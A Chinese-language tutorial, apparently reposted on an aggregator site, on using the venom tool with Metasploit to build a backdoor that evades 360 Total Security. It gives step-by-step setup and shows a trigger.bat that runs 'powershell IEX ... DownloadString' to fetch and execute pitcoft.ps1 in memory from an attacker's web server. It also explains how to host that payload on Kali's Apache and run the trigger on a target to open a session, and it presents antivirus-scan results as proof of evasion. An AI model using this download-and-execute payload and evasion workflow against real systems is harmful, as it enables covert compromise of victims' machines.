星空网 > 软件开发 > 操作系统

venom结合Metasploit绕过360安全卫士

 

原理msfvenom是msfpayload和msfencode的结合体,利用msfvenom生成shellcode,venom生成工具使用了

一些 Veil-Evasion.py, unicorn.py, powersploit.py 等工具上的技术。但是venom 是基于 bash 编写的,而不是

基于 Python。相比 veil evasion 在 payload 格式方面,它支持的更多[例如 .msi .hta .vbs .ps1 .dll.php .jar .pdf]而这些 veil evasion 都不支持。

msfvenom下载地址:https://github.com/pitcoft/venom/

1.从Github上下载框架,你可以下载到以下格式:tar.gz OR zip OR git clone 2.赋予文件可执行权限:cd venom-mainsudo chmod -R +x *.shsudo chmod -R +x *.py 3.安装依赖关系包:cd auxsudo ./setup.sh 4.运行sudo ./venom.sh

访问下载路径:https://github.com/pitcoft/venom/ 进行下载

venom结合Metasploit绕过360安全卫士images/loading.gif' data-original="http://images2015.cnblogs.com/blog/1097547/201701/1097547-20170119232604484-786458297.png" >

下载之后会得到一个zip的压缩包,我们用unzip解压即可

venom结合Metasploit绕过360安全卫士

 

1、运行venom.sh之后我们可以看到msfvenom的界面是这样的:

venom结合Metasploit绕过360安全卫士

2、上图这里的模块比较多,有 /apk/exe/php/vbs/bat/ 等格式。在这里我以 11号 模块为例:

venom结合Metasploit绕过360安全卫士

3、在下方输入 11 ,然后按回车键:

venom结合Metasploit绕过360安全卫士

4、接下来会弹出一个窗口,要求你填写攻击者的 IP 、 端口 以及后门名称

 venom结合Metasploit绕过360安全卫士

venom结合Metasploit绕过360安全卫士

venom结合Metasploit绕过360安全卫士

5、在接下来我们要填写后门 选择监听模块类型:

venom结合Metasploit绕过360安全卫士

 选择完后点击确定

6、在目录我们可以查看 outoput 输出文件:

venom结合Metasploit绕过360安全卫士

两个文件分别是 pitcoft.ps1trigger.bat

8、这里选择 msf 的后门模块,选择完后会自动帮你设置相关参数:

venom结合Metasploit绕过360安全卫士

venom结合Metasploit绕过360安全卫士

好,我们看到我们的msf已经准备就绪了

venom结合Metasploit绕过360安全卫士

9、下面,我们简单查看下 bat 文件的内容。这里需要我们把 pitcoft.ps1 文件,放到 web 服务器上。 让 powershell去远程下载木马文件:

1 :: powershell template | Author: r00t-3xp10it2 :: Matthew Graeber - DownloadString3 :: Download/execute payload in RAM4 :: ---5 [url=home.php?mod=space&uid=46675]@echo[/url] off6 echo [*] Please wait, preparing software ...7 powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.105/pitcoft.ps1')

10、开启 kali 下的 apache 服务:

1 service apache2 start

venom结合Metasploit绕过360安全卫士

11、将 pitcoft.ps1丢到 /var/www/ 目录下,以便让木马文件访问攻击者 web 地址:

venom结合Metasploit绕过360安全卫士

12、我们只需要 trigger.bat 文件,到目标系统运行一次即可:

venom结合Metasploit绕过360安全卫士

venom结合Metasploit绕过360安全卫士

可以看到已经成功建立会话了。

 最后我们来看一下我们的免杀问题

360安全卫士检测如下:

venom结合Metasploit绕过360安全卫士

VirSCAN.org-多引擎在线扫描结果:

venom结合Metasploit绕过360安全卫士

 




原标题:venom结合Metasploit绕过360安全卫士

关键词:ASP

ASP
*特别声明:以上内容来自于网络收集,著作权属原作者所有,如有侵权,请联系我们: admin#shaoqun.com (#换成@)。

Temu在英国被指销售违规品类,已删除下架:https://www.kjdsnews.com/a/1667445.html
亚马逊墨西哥启动大规模招聘,全力备战Buen Fin大促:https://www.kjdsnews.com/a/1667446.html
从“全国卖”到“全球卖”,卖家借道SHEIN冲刺黑五!:https://www.kjdsnews.com/a/1667447.html
日本家具批发老大SEKI开启定制型网站:https://www.kjdsnews.com/a/1667448.html
东南亚情报局|大促增长超10倍!手机配件高潜力市场爆火:https://www.kjdsnews.com/a/1667449.html
10个问答解析亚马逊广告竞价的底层逻辑1.0:https://www.kjdsnews.com/a/1667450.html
大批Listing被下架,“黄色警告”!提示存在停用风险:https://www.kjdsnews.com/a/1836647.html
跨境支付百科——巴西支付篇:https://www.kjdsnews.com/a/1836648.html
相关文章
我的浏览记录
最新相关资讯
海外公司注册 | 跨境电商服务平台 | 深圳旅行社 | 东南亚物流